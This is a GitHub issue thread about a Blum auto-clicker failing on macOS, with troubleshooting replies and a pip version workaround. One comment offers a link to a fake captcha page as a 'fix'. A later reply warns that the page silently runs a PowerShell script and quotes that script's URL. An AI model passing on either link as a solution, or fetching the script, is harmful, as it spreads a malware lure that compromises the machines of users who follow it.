### ISSUE TITLE
Ternimal Error

### ISSUE THREAD

**Issue by Sumxittt** [devbutlazy/Blum-AutoClicker#10]
Showing This Errors Please Give Solution

![Screenshot 2024-10-03 at 1 02 56 PM](https://github.com/user-attachments/assets/cbd4c6bb-5383-4aab-a08c-a2a4e1111414)

**Comment by mahlenko** [comment]
I didn't find any clickers for macos. This only works on Windows

**Comment by casper123s** [comment]
to fix your trouble check this [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by 7urkm3n** [comment]
> to fix your trouble check this [click](https://www.calvarywhangarei.co.nz/captha/index.html) maybe this will solve your problem.

Dnt try this at home: he tries to run this powershell silently on your machine. SCRIPT: https://javierlopez.eu/adapt/kingdom

**Comment by devbutlazy** [comment]
It works now, try it in v2

**Comment by mahlenko** [comment]
На MacOS запустилось с этой версией mouse ([pip install mouse==0.5.0](https://pypi.python.org/pypi/mouse/0.5.0)). Но не находит окна: "Blum window not found! Please open it, and restart the program."
